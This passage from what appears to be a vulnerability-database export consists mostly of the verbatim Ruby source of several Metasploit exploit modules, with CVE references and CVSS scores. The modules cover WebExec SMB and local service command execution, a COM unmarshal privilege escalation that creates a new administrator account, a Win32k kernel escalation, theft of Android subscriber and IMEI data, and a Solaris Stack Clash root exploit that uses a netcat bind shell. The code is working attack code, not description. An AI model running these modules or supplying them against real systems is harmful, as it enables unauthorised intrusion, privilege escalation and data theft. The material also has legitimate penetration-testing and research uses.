This module is similar\n to the \"psexec\" module, except allows any non-guest account by default.\n },\n 'Author' =>\n [\n 'Ron <ron@skullsecurity.net>',\n ],\n 'License' => MSF_LICENSE,\n 'Privileged' => true,\n 'DefaultOptions' =>\n {\n 'WfsDelay' => 10,\n 'EXITFUNC' => 'thread'\n },\n 'References' =>\n [\n ['URL', 'https://webexec.org'],\n [ 'CVE', '2018-15442' ],\n ],\n 'Payload' =>\n {\n 'Space' => 3072,\n 'DisableNops' => true\n },\n 'Platform' => 'win',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Targets' =>\n [\n [ 'Automatic', { } ],\n [ 'Native upload', { } ],\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Oct 24 2018'\n ))\n\n register_options(\n [\n # This has to be a full path, %ENV% variables are not expanded\n OptString.new('TMPDIR', [ true, \"The directory to stage our payload in\", \"c:\\\\Windows\\\\Temp\\\\\" ])\n ])\n\n register_advanced_options(\n [\n OptBool.new('ALLOW_GUEST', [true, \"Keep trying if only given guest access\", false]),\n OptInt.new('MAX_LINE_LENGTH', [true, \"The length of lines when splitting up the payload\", 1000]),\n ])\n end\n\n # This is the callback for cmdstager, which breaks the full command into\n # chunks and sends it our way. 
We have to do a bit of finangling to make it\n # work correctly\n def execute_command(command, opts)\n # Replace the empty string, \"\", with a workaround - the first 0 characters of \"A\"\n command = command.gsub('\"\"', 'mid(Chr(65), 1, 0)')\n\n # Replace quoted strings with Chr(XX) versions, in a naive way\n command = command.gsub(/\"[^\"]*\"/) do |capture|\n capture.gsub(/\"/, \"\").chars.map do |c|\n \"Chr(#{c.ord})\"\n end.join('+')\n end\n\n # Prepend \"cmd /c\" so we can use a redirect\n command = \"cmd /c \" + command\n\n execute_single_command(command, opts)\n end\n\n def exploit\n print_status(\"Connecting to the server...\")\n connect(versions: [2,1])\n\n print_status(\"Authenticating to #{smbhost} as user '#{splitname(datastore['SMBUser'])}'...\")\n smb_login\n\n if not simple.client.auth_user and not datastore['ALLOW_GUEST']\n print_line(\" \")\n print_error(\n \"FAILED! The remote host has only provided us with Guest privileges. \" +\n \"Please make sure that the correct username and password have been provided. 
\" +\n \"Windows XP systems that are not part of a domain will only provide Guest privileges \" +\n \"to network logins by default.\"\n )\n print_line(\" \")\n disconnect\n return\n end\n\n begin\n if datastore['SMBUser'].to_s.strip.length > 0\n report_auth\n end\n\n # Avoid implementing NTLMSSP on Windows XP\n # http://seclists.org/metasploit/2009/q1/6\n if smb_peer_os == \"Windows 5.1\"\n connect(versions: [1])\n smb_login\n end\n\n wexec(true) do |opts|\n opts[:flavor] = :vbs\n opts[:linemax] = datastore['MAX_LINE_LENGTH']\n opts[:temp] = datastore['TMPDIR']\n opts[:delay] = 0.05\n execute_cmdstager(opts)\n end\n handler\n disconnect\n end\n\n end\n\n def report_auth\n service_data = {\n address: ::Rex::Socket.getaddress(datastore['RHOST'],true),\n port: datastore['RPORT'],\n service_name: 'smb',\n protocol: 'tcp',\n workspace_id: myworkspace_id\n }\n\n credential_data = {\n origin_type: :service,\n module_fullname: self.fullname,\n private_data: datastore['SMBPass'],\n username: datastore['SMBUser'].downcase\n }\n\n if datastore['SMBDomain'] and datastore['SMBDomain'] != 'WORKGROUP'\n credential_data.merge!({\n realm_key: Metasploit::Model::Realm::Key::ACTIVE_DIRECTORY_DOMAIN,\n realm_value: datastore['SMBDomain']\n })\n end\n\n if datastore['SMBPass'] =~ /[0-9a-fA-F]{32}:[0-9a-fA-F]{32}/\n credential_data.merge!({:private_type => :ntlm_hash})\n else\n credential_data.merge!({:private_type => :password})\n end\n\n credential_data.merge!(service_data)\n\n credential_core = create_credential(credential_data)\n\n login_data = {\n access_level: 'Admin',\n core: credential_core,\n last_attempted_at: DateTime.now,\n status: Metasploit::Model::Login::Status::SUCCESSFUL\n }\n\n login_data.merge!(service_data)\n create_credential_login(login_data)\n end\nend\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/smb/webexec.rb"}, {"lastseen": 
"2019-11-30T00:36:45", "bulletinFamily": "exploit", "description": "This module exploits a flaw in the 'webexservice' Windows service, which runs as SYSTEM, can be used to run arbitrary commands locally, and can be started by limited users in default installations.\n", "modified": "2018-10-24T21:13:47", "published": "2018-10-23T20:51:23", "id": "MSF:EXPLOIT/WINDOWS/LOCAL/WEBEXEC", "href": "", "type": "metasploit", "title": "WebEx Local Service Permissions Exploit", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = GoodRanking\n\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n include Msf::Post::File\n include Msf::Post::Windows::Priv\n include Msf::Post::Windows::Services\n include Msf::Post::Windows::Accounts\n\n def initialize(info={})\n super( update_info( info,\n 'Name' => 'WebEx Local Service Permissions Exploit',\n 'Description' => %q{\n This module exploits a flaw in the 'webexservice' Windows service, which runs as SYSTEM,\n can be used to run arbitrary commands locally, and can be started by limited users in\n default installations.\n },\n 'References' =>\n [\n ['URL', 'https://webexec.org'],\n ['CVE', '2018-15442']\n ],\n 'DisclosureDate' => \"Oct 09 2018\",\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Jeff McJunkin <jeff.mcjunkin[at]gmail.com>'\n ],\n 'Platform' => [ 'win'],\n 'Targets' =>\n [\n [ 'Automatic', {} ],\n [ 'Windows x86', { 'Arch' => ARCH_X86 } ],\n [ 'Windows x64', { 'Arch' => ARCH_X64 } ]\n ],\n 'SessionTypes' => [ \"meterpreter\" ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'thread',\n 'WfsDelay' => 5,\n 'ReverseConnectRetries' => 255\n },\n 'DefaultTarget' => 0\n ))\n\n register_options([\n OptString.new(\"DIR\", [ false, \"Specify a directory to plant the EXE.\", \"%SystemRoot%\\\\Temp\"])\n ])\n @service_name = 'webexservice'\n end\n\n def validate_arch\n 
return target unless target.name == 'Automatic'\n\n case sysinfo['Architecture']\n when 'x86'\n fail_with(Failure::BadConfig, 'Invalid payload architecture') if payload_instance.arch.first == 'x64'\n vprint_status('Detected x86 system')\n return targets[1]\n when 'x64'\n vprint_status('Detected x64 system')\n return targets[2]\n end\n end\n\n def check_service_exists?(service)\n srv_info = service_info(service)\n\n if srv_info.nil?\n vprint_warning(\"Unable to enumerate services.\")\n return false\n end\n\n if srv_info && srv_info[:display].empty?\n vprint_warning(\"Service #{service} does not exist.\")\n return false\n else\n return true\n end\n end\n\n def check\n unless check_service_exists?(@service_name)\n return Exploit::CheckCode::Safe\n end\n\n srv_info = service_info(@service_name)\n\n vprint_status(srv_info.to_s)\n\n case START_TYPE[srv_info[:starttype]]\n when 'Disabled'\n vprint_error(\"Service startup is Disabled, so will be unable to exploit unless account has correct permissions...\")\n return Exploit::CheckCode::Safe\n when 'Manual'\n vprint_error(\"Service startup is Manual, so will be unable to exploit unless account has correct permissions...\")\n return Exploit::CheckCode::Safe\n when 'Auto'\n vprint_good(\"Service is set to Automatically start...\")\n end\n\n if check_search_path\n return Exploit::CheckCode::Safe\n end\n\n return Exploit::CheckCode::Appears\n end\n\n def check_write_access(path)\n perm = check_dir_perms(path, @token)\n if perm and perm.include?('W')\n print_good(\"Write permissions in #{path} - #{perm}\")\n return true\n elsif perm\n vprint_status (\"Permissions for #{path} - #{perm}\")\n else\n vprint_status (\"No permissions for #{path}\")\n end\n\n return false\n end\n\n\n def exploit\n begin\n @token = get_imperstoken\n rescue Rex::Post::Meterpreter::RequestError\n vprint_error(\"Error while using get_imperstoken: #{e}\")\n end\n\n fail_with(Failure::Unknown, \"Unable to retrieve token.\") unless @token\n\n if is_system?\n 
fail_with(Failure::Unknown, \"Current user is already SYSTEM, aborting.\")\n end\n\n print_status(\"Checking service exists...\")\n if !check_service_exists?(@service_name)\n fail_with(Failure::NoTarget, \"The service doesn't exist.\")\n end\n\n if is_uac_enabled?\n print_warning(\"UAC is enabled, may get false negatives on writable folders.\")\n end\n\n # Use manually selected Dir\n file_path = datastore['DIR']\n\n @exe_file_name = Rex::Text.rand_text_alphanumeric(8)\n @exe_file_path = \"#{file_path}\\\\#{@exe_file_name}.exe\"\n\n service_information = service_info(@service_name)\n\n # Check architecture\n valid_arch = validate_arch\n exe = generate_payload_exe(:arch => valid_arch.arch)\n\n #\n # Drop the malicious executable into the path\n #\n print_status(\"Writing #{exe.length.to_s} bytes to #{@exe_file_path}...\")\n begin\n write_file(@exe_file_path, exe)\n register_file_for_cleanup(@exe_file_path)\n rescue Rex::Post::Meterpreter::RequestError => e\n # Can't write the file, can't go on\n fail_with(Failure::Unknown, e.message)\n end\n\n #\n # Run the service\n #\n print_status(\"Launching service...\")\n res = cmd_exec(\"cmd.exe\",\n \"/c sc start webexservice install software-update 1 #{@exe_file_path}\")\n\n if service_restart(@service_name)\n print_status(\"Service started...\")\n else\n service_information = service_info(@service_name)\n if service_information[:starttype] == START_TYPE_AUTO\n if job_id\n print_status(\"Unable to start service, handler running waiting for a reboot...\")\n while(true)\n break if session_created?\n select(nil,nil,nil,1)\n end\n else\n fail_with(Failure::Unknown, \"Unable to start service, use exploit -j to run as a background job and wait for a reboot...\")\n end\n else\n fail_with(Failure::Unknown, \"Unable to start service, and it does not auto start, cleaning up...\")\n end\n end\n end\nend\n\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": 
"https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/local/webexec.rb"}, {"lastseen": "2019-11-27T08:37:08", "bulletinFamily": "exploit", "description": "This module exploits a local privilege escalation bug which exists in microsoft COM for windows when it fails to properly handle serialized objects.\n", "modified": "2019-09-24T11:15:43", "published": "2018-10-19T23:15:44", "id": "MSF:POST/WINDOWS/ESCALATE/UNMARSHAL_CMD_EXEC", "href": "", "type": "metasploit", "title": "Windows unmarshal post exploitation", "sourceData": "# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/post/common'\nrequire 'msf/core/post/file'\nrequire 'msf/core/post/windows/priv'\n\nclass MetasploitModule < Msf::Post\n include Msf::Post::Common\n include Msf::Post::File\n# include Msf::Post::Windows::Priv\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Windows unmarshal post exploitation',\n 'Description' => %q{\n This module exploits a local privilege escalation bug which exists\n in microsoft COM for windows when it fails to properly handle serialized objects.},\n 'References' =>\n [\n ['CVE', '2018-0824'],\n ['URL', 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-0824'],\n ['URL', 'https://github.com/x73x61x6ex6ax61x79/UnmarshalPwn'],\n ['EDB', '44906']\n ],\n 'Author' =>\n [\n 'Nicolas Joly', # Vulnerability discovery\n 'Matthias Kaiser', # Exploit PoC\n 'Sanjay Gondaliya', # Modified PoC\n 'Pratik Shah <pratik@notsosecure.com>' # Metasploit module\n ],\n 'DisclosureDate' => 'Aug 05 2018',\n 'Platform' => ['win'],\n 'Arch' => ARCH_X64,\n 'License' => MSF_LICENSE,\n ))\n\n register_options(\n [\n OptString.new('COMMAND',\n [false, 'The command to execute as SYSTEM (Can only be a cmd.exe builtin or Windows binary, (net user /add %RAND% %RAND% & net localgroup administrators /add <user>).', nil]),\n 
OptString.new('EXPLOIT_NAME',\n [false, 'The filename to use for the exploit binary (%RAND% by default).', nil]),\n OptString.new('SCRIPT_NAME',\n [false, 'The filename to use for the COM script file (%RAND% by default).', nil]),\n OptString.new('PATH',\n [false, 'Path to write binaries (%TEMP% by default).', nil]),\n ])\n end\n\n def setup\n super\n validate_active_host\n @exploit_name = datastore['EXPLOIT_NAME'] || Rex::Text.rand_text_alpha((rand(8) + 6))\n @script_name = datastore['SCRIPT_NAME'] || Rex::Text.rand_text_alpha((rand(8) + 6))\n @exploit_name = \"#{exploit_name}.exe\" unless exploit_name.match(/\\.exe$/i)\n @script_name = \"#{script_name}.sct\" unless script_name.match(/\\.sct$/i)\n @temp_path = datastore['PATH'] || session.sys.config.getenv('TEMP')\n @exploit_path = \"#{temp_path}\\\\#{exploit_name}\"\n @script_path = \"#{temp_path}\\\\#{script_name}\"\n end\n\n def populate_command\n username = Rex::Text.rand_text_alpha((rand(8) + 6))\n password = Rex::Text.rand_text_alpha((rand(8) + 6))\n print_status(\"username = #{username}, password = #{password}\")\n cmd_to_run = 'net user /add ' + username + ' ' + password\n cmd_to_run += ' & net localgroup administrators /add ' + username\n print_status(cmd_to_run)\n return cmd_to_run\n end\n\n def validate_active_host\n begin\n print_status(\"Attempting to Run on #{sysinfo['Computer']} via session ID: #{datastore['SESSION']}\")\n rescue Rex::Post::Meterpreter::RequestError => e\n elog(\"#{e.class} #{e.message}\\n#{e.backtrace * \"\\n\"}\")\n raise Msf::Exploit::Failed, 'Could not connect to session'\n end\n end\n\n def validate_remote_path(path)\n unless directory?(path)\n fail_with(Failure::Unreachable, \"#{path} does not exist on the target\")\n end\n end\n\n def validate_target\n if sysinfo['Architecture'] == ARCH_X86\n fail_with(Failure::NoTarget, 'Exploit code is 64-bit only')\n end\n if sysinfo['OS'] =~ /XP/\n fail_with(Failure::Unknown, 'The exploit binary does not support Windows XP')\n end\n 
end\n\n def ensure_clean_destination(path)\n if file?(path)\n print_status(\"#{path} already exists on the target. Deleting...\")\n begin\n file_rm(path)\n print_status(\"Deleted #{path}\")\n rescue Rex::Post::Meterpreter::RequestError => e\n elog(\"#{e.class} #{e.message}\\n#{e.backtrace * \"\\n\"}\")\n print_error(\"Unable to delete #{path}\")\n end\n end\n end\n\n def upload_exploit\n local_exploit_path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2018-0824', 'UnmarshalPwn.exe')\n upload_file(exploit_path, local_exploit_path)\n print_status(\"Exploit uploaded on #{sysinfo['Computer']} to #{exploit_path}\")\n end\n\n def upload_script(cmd_to_run)\n vprint_status(\"Creating the sct file with command #{cmd_to_run}\")\n local_script_template_path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2018-0824', 'script_template')\n script_template_data = ::IO.read(local_script_template_path)\n vprint_status(\"script_template_data.length = #{script_template_data.length}\")\n full_command = 'cmd.exe /c ' + cmd_to_run\n full_command = full_command\n script_data = script_template_data.sub!('SCRIPTED_COMMAND', full_command)\n if script_data == nil\n fail_with(Failure::BadConfig, \"Failed to substitute command in script_template\")\n end\n vprint_status(\"Writing #{script_data.length} bytes to #{script_path} to target\")\n write_file(script_path, script_data)\n vprint_status('Script uploaded successfully')\n end\n\n def run\n if datastore['COMMAND'].nil?\n cmd_to_run = populate_command\n else\n cmd_to_run = datastore['COMMAND']\n end\n print_status(\"exploit path is: #{exploit_path}\")\n print_status(\"script path is: #{script_path}\")\n print_status(\"command is: #{cmd_to_run}\")\n begin\n validate_active_host\n validate_target\n validate_remote_path(temp_path)\n ensure_clean_destination(exploit_path)\n ensure_clean_destination(script_path)\n vprint_status(\"Uploading Script to #{script_path}\")\n upload_script(cmd_to_run)\n vprint_status(\"Uploading 
Exploit to #{exploit_path}\")\n upload_exploit\n vprint_status('Launching Exploit...')\n command_output = cmd_exec(exploit_path + ' ' + script_path)\n vprint_status(command_output)\n print_good('Exploit Completed')\n ensure_clean_destination(exploit_path)\n ensure_clean_destination(script_path)\n rescue Rex::Post::Meterpreter::RequestError => e\n elog(\"#{e.class} #{e.message}\\n#{e.backtrace * \"\\n\"}\")\n print_good('Command failed, cleaning up')\n print_error(e.message)\n ensure_clean_destination(exploit_path)\n ensure_clean_destination(script_path)\n end\n end\n attr_reader :exploit_name\n attr_reader :script_name\n attr_reader :temp_path\n attr_reader :exploit_path\n attr_reader :script_path\nend\n\n", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/post/windows/escalate/unmarshal_cmd_exec.rb"}, {"lastseen": "2019-11-19T02:24:32", "bulletinFamily": "exploit", "description": "This module exploits elevation of privilege vulnerability that exists in Windows 7 and 2008 R2 when the Win32k component fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. 
This module is tested against windows 7 x86, windows 7 x64 and windows server 2008 R2 standard x64.\n", "modified": "2018-10-18T19:30:20", "published": "2018-10-10T19:41:14", "id": "MSF:EXPLOIT/WINDOWS/LOCAL/MS18_8120_WIN32K_PRIVESC", "href": "", "type": "metasploit", "title": "Windows SetImeInfoEx Win32k NULL Pointer Dereference", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = GoodRanking\n\n include Msf::Post::File\n include Msf::Exploit::EXE\n include Msf::Post::Windows::Priv\n include Msf::Exploit::FileDropper\n\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => 'Windows SetImeInfoEx Win32k NULL Pointer Dereference',\n 'Description' => %q{\n This module exploits elevation of privilege vulnerability that exists in Windows 7 and 2008 R2\n when the Win32k component fails to properly handle objects in memory. An attacker who\n successfully exploited this vulnerability could run arbitrary code in kernel mode. 
An\n attacker could then install programs; view, change, or delete data; or create new\n accounts with full user rights.\n\n This module is tested against windows 7 x86, windows 7 x64 and windows server 2008 R2 standard x64.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [\n 'unamer', # Exploit PoC\n 'bigric3', # Analysis and exploit\n 'Anton Cherepanov', # Vulnerability discovery\n 'Dhiraj Mishra <dhiraj@notsosecure.com>' # Metasploit\n ],\n 'Platform' => 'win',\n 'SessionTypes' => [ 'meterpreter' ],\n 'DefaultOptions' => {\n 'EXITFUNC' => 'thread'\n },\n 'Targets' => [\n [ 'Automatic', {} ],\n [ 'Windows 7 x64', { 'Arch' => ARCH_X64 } ],\n [ 'Windows 7 x86', { 'Arch' => ARCH_X86 } ]\n ],\n 'Payload' => {\n 'Space' => 4096,\n 'DisableNops' => true\n },\n 'References' => [\n ['BID', '104034'],\n ['CVE', '2018-8120'],\n ['URL', 'https://github.com/unamer/CVE-2018-8120'],\n ['URL', 'https://github.com/bigric3/cve-2018-8120'],\n ['URL', 'http://bigric3.blogspot.com/2018/05/cve-2018-8120-analysis-and-exploit.html'],\n ['URL', 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8120']\n ],\n 'DisclosureDate' => 'May 9 2018',\n 'DefaultTarget' => 0\n ))\n end\n\n def assign_target\n if is_system?\n fail_with(Failure::None, 'Session is already elevated')\n end\n\n if sysinfo['OS'] =~ /XP|NT/i\n fail_with(Failure::Unknown, 'The exploit binary does not support Windows XP')\n end\n\n return target unless target.name == 'Automatic'\n\n case sysinfo['Architecture']\n when 'x64'\n vprint_status('Targeting x64 system')\n return targets[1]\n when 'x86'\n fail_with(Failure::BadConfig, \"Invalid payload architecture\") if payload_instance.arch.first == ARCH_X64\n vprint_status('Targeting x86 system')\n return targets[2]\n end\n end\n\n def write_file_to_target(fname, data)\n tempdir = session.sys.config.getenv('TEMP')\n file_loc = \"#{tempdir}\\\\#{fname}\"\n vprint_warning(\"Attempting to write #{fname} to #{tempdir}\")\n write_file(file_loc, data)\n 
vprint_good(\"#{fname} written\")\n file_loc\n rescue Rex::Post::Meterpreter::RequestError => e\n elog(\"#{e.class} #{e.message}\\n#{e.backtrace * \"\\n\"}\")\n fail_with(Failure::Unknown, \"Writing #{fname} to disk was unsuccessful\")\n end\n\n def check_arch\n sys_arch = assign_target\n if sys_arch.name =~ /x86/\n return 'CVE-2018-8120x86.exe'\n else sys_arch.name =~ /x64/\n return 'CVE-2018-8120x64.exe'\n end\n end\n\n def exploit\n cve_fname = check_arch\n rexe = File.join(Msf::Config.data_directory, 'exploits', 'CVE-2018-8120', cve_fname)\n vprint_status(\"Reading payload from file #{rexe}\")\n raw = File.read(rexe)\n\n rexename = \"#{Rex::Text.rand_text_alphanumeric(10)}.exe\"\n vprint_status(\"EXE's name is: #{rexename}\")\n exe = generate_payload_exe\n tempexename = \"#{Rex::Text.rand_text_alpha(6..14)}.exe\"\n\n exe_payload = write_file_to_target(tempexename, exe)\n vprint_status(\"Payload uploaded to temp folder\")\n cve_exe = write_file_to_target(rexename, raw)\n command = \"\\\"#{cve_exe}\\\" \\\"#{exe_payload}\\\"\"\n vprint_status(\"Location of CVE-2018-8120.exe is: #{cve_exe}\")\n register_file_for_cleanup(exe_payload)\n\n vprint_status(\"Executing command : #{command}\")\n cmd_exec_get_pid(command)\n print_good('Exploit finished, wait for privileged payload execution to complete.')\n end\nend\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/local/ms18_8120_win32k_privesc.rb"}, {"lastseen": "2019-11-05T18:22:31", "bulletinFamily": "exploit", "description": "This module displays the subscriber info stored on the target phone. 
It uses call service to get values of each transaction code like imei etc.\n", "modified": "2018-10-01T08:54:46", "published": "2018-10-01T08:54:46", "id": "MSF:POST/ANDROID/GATHER/SUB_INFO", "href": "", "type": "metasploit", "title": "extracts subscriber info from target device", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Post\n\n include Msf::Post::Common\n include Msf::Post::Android::Priv\n include Msf::Post::Android::System\n\n def initialize(info={})\n super( update_info( info, {\n 'Name' => \"extracts subscriber info from target device\",\n 'Description' => %q{\n This module displays the subscriber info stored on the target phone.\n It uses call service to get values of each transaction code like imei etc.\n },\n 'License' => MSF_LICENSE,\n 'Author' => ['Auxilus'],\n 'SessionTypes' => [ 'meterpreter', 'shell' ],\n 'Platform' => 'android',\n }\n ))\n end\n\n def run\n unless is_root?\n print_error(\"This module requires root permissions.\")\n return\n end\n\n @transaction_codes ||= [\n 'DeviceId',\n 'DeviceIdForSubscriber',\n 'ImeiForSubscriber',\n 'DeviceSvn',\n 'SubscriberId',\n 'SubscriberIdForSubscriber',\n 'GroupIdLevel1',\n 'GroupIdLevel1ForSubscriber',\n 'IccSerialNumber',\n 'IccSerialNumberForSubscriber',\n 'Line1Number',\n 'Line1NumberForSubscriber',\n 'Line1AlphaTag',\n 'Line1AlphaTagForSubscriber',\n 'Msisdn',\n 'MsisdnForSubscriber',\n 'VoiceMailNumber',\n 'VoiceMailNumberForSubscriber',\n 'CompleteVoiceMailNumber',\n 'CompleteVoiceMailNumberForSubscriber',\n 'VoiceMailAlphaTag',\n 'VoiceMailAlphaTagForSubscriber',\n 'IsimImpi',\n 'IsimDomain',\n 'IsimImpu',\n 'IsimIst',\n 'IsimPcscf',\n 'IsimChallengeResponse',\n 'IccSimChallengeResponse'\n ]\n values ||= []\n arr ||= []\n for code in 1..@transaction_codes.length do\n print_status(\"using code : #{code}\")\n cmd = \"service call iphonesubinfo #{code}\"\n 
block = cmd_exec(cmd)\n value,tc = get_val(block, code)\n arr << [tc, value]\n end\n\n tc_tbl = Rex::Text::Table.new(\n 'Header' => 'Subscriber info',\n 'Indent' => 1,\n 'Columns' => ['transaction code', 'value']\n )\n\n arr.each do |a|\n tc_tbl << [\n a[0], # TRANSACTION CODE\n a[1] # value\n ]\n end\n print_line(tc_tbl.to_s)\n end\n\n def get_val(data, code)\n parsed = data.gsub(/Parcel/, '')\n string = ''\n 100.times do |i|\n next if i % 2 == 0\n str = parsed.split(\"'\")[i]\n break if str.nil?\n string += str\n end\n v = ''\n string.split(\".\").each do |chr|\n next if chr.nil? or chr == \"\\n\"\n v += chr\n end\n return v,@transaction_codes[code-1]\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/post/android/gather/sub_info.rb"}, {"lastseen": "2019-12-04T08:52:29", "bulletinFamily": "exploit", "description": "This module exploits a vulnerability in RSH on unpatched Solaris systems which allows users to gain root privileges. The stack guard page on unpatched Solaris systems is of insufficient size to prevent collisions between the stack and heap memory, aka Stack Clash. This module uploads and executes Qualys' Solaris_rsh.c exploit, which exploits a vulnerability in RSH to bypass the stack guard page to write to the stack and create a SUID root shell. This module has offsets for Solaris versions 11.1 (x86) and Solaris 11.3 (x86). Exploitation will usually complete within a few minutes using the default number of worker threads (10). Occasionally, exploitation will fail. If the target system is vulnerable, usually re-running the exploit will be successful. 
This module has been tested successfully on Solaris 11.1 (x86) and Solaris 11.3 (x86).\n", "modified": "2019-01-10T19:19:14", "published": "2018-09-18T17:38:59", "id": "MSF:EXPLOIT/SOLARIS/LOCAL/RSH_STACK_CLASH_PRIV_ESC", "href": "", "type": "metasploit", "title": "Solaris RSH Stack Clash Privilege Escalation", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = GoodRanking\n\n include Msf::Post::File\n include Msf::Post::Solaris::Priv\n include Msf::Post::Solaris::System\n include Msf::Post::Solaris::Kernel\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Solaris RSH Stack Clash Privilege Escalation',\n 'Description' => %q{\n This module exploits a vulnerability in RSH on unpatched Solaris\n systems which allows users to gain root privileges.\n\n The stack guard page on unpatched Solaris systems is of\n insufficient size to prevent collisions between the stack\n and heap memory, aka Stack Clash.\n\n This module uploads and executes Qualys' Solaris_rsh.c exploit,\n which exploits a vulnerability in RSH to bypass the stack guard\n page to write to the stack and create a SUID root shell.\n\n This module has offsets for Solaris versions 11.1 (x86) and\n Solaris 11.3 (x86).\n\n Exploitation will usually complete within a few minutes using\n the default number of worker threads (10). Occasionally,\n exploitation will fail. 
If the target system is vulnerable,\n usually re-running the exploit will be successful.\n\n This module has been tested successfully on Solaris 11.1 (x86)\n and Solaris 11.3 (x86).\n },\n 'References' =>\n [\n ['BID', '99151'],\n ['BID', '99153'],\n ['CVE', '2017-1000364'],\n ['CVE', '2017-3629'],\n ['CVE', '2017-3630'],\n ['CVE', '2017-3631'],\n ['EDB', '42270'],\n ['URL', 'http://www.oracle.com/technetwork/security-advisory/alert-cve-2017-3629-3757403.html'],\n ['URL', 'https://blog.qualys.com/securitylabs/2017/06/19/the-stack-clash'],\n ['URL', 'https://www.qualys.com/2017/06/19/stack-clash/stack-clash.txt']\n ],\n 'Notes' => { 'AKA' => ['Stack Clash', 'Solaris_rsh.c'] },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Qualys Corporation', # Stack Clash technique and Solaris_rsh.c exploit\n 'bcoles' # Metasploit\n ],\n 'DisclosureDate' => 'Jun 19 2017',\n 'Privileged' => true,\n 'Platform' => ['unix'],\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'SessionTypes' => ['shell', 'meterpreter'],\n 'Targets' =>\n [\n ['Automatic', {}],\n ['Solaris 11.1', {}],\n ['Solaris 11.3', {}]\n ],\n 'DefaultOptions' =>\n {\n 'PAYLOAD' => 'cmd/unix/bind_netcat',\n 'WfsDelay' => 10,\n 'PrependFork' => true\n },\n 'DefaultTarget' => 0))\n register_options [\n OptInt.new('WORKERS', [true, 'Number of workers', '10']),\n OptString.new('RSH_PATH', [true, 'Path to rsh executable', '/usr/bin/rsh'])\n ]\n register_advanced_options [\n OptBool.new('ForceExploit', [false, 'Override check result', false]),\n OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])\n ]\n end\n\n def rsh_path\n datastore['RSH_PATH']\n end\n\n def mkdir(path)\n vprint_status \"Creating '#{path}' directory\"\n cmd_exec \"mkdir -p #{path}\"\n register_dir_for_cleanup path\n end\n\n def upload(path, data)\n print_status \"Writing '#{path}' (#{data.size} bytes) ...\"\n rm_f path\n write_file path, data\n register_file_for_cleanup path\n end\n\n def upload_and_compile(path, data)\n upload 
\"#{path}.c\", data\n\n output = cmd_exec \"PATH=$PATH:/usr/sfw/bin/:/opt/sfw/bin/:/opt/csw/bin gcc -Wall -std=gnu99 -o #{path} #{path}.c\"\n unless output.blank?\n print_error output\n fail_with Failure::Unknown, \"#{path}.c failed to compile\"\n end\n\n register_file_for_cleanup path\n end\n\n def symlink(link_target, link_name)\n print_status \"Symlinking #{link_target} to #{link_name}\"\n rm_f link_name\n cmd_exec \"ln -sf #{link_target} #{link_name}\"\n register_file_for_cleanup link_name\n end\n\n def check\n unless setuid? rsh_path\n vprint_error \"#{rsh_path} is not setuid\"\n return CheckCode::Safe\n end\n vprint_good \"#{rsh_path} is setuid\"\n\n unless has_gcc?\n vprint_error 'gcc is not installed'\n return CheckCode::Safe\n end\n vprint_good 'gcc is installed'\n\n version = kernel_version\n if version.to_s.eql? ''\n vprint_error 'Could not determine Solaris version'\n return CheckCode::Detected\n end\n\n unless ['11.1', '11.3'].include? version\n vprint_error \"Solaris version #{version} is not vulnerable\"\n return CheckCode::Safe\n end\n vprint_good \"Solaris version #{version} appears to be vulnerable\"\n\n CheckCode::Detected\n end\n\n def exploit\n if is_root?\n fail_with Failure::BadConfig, 'Session already has root privileges'\n end\n\n unless check == CheckCode::Detected\n unless datastore['ForceExploit']\n fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'\n end\n print_warning 'Target does not appear to be vulnerable'\n end\n\n unless writable? datastore['WritableDir']\n fail_with Failure::BadConfig, \"#{datastore['WritableDir']} is not writable\"\n end\n\n if target.name.eql? 
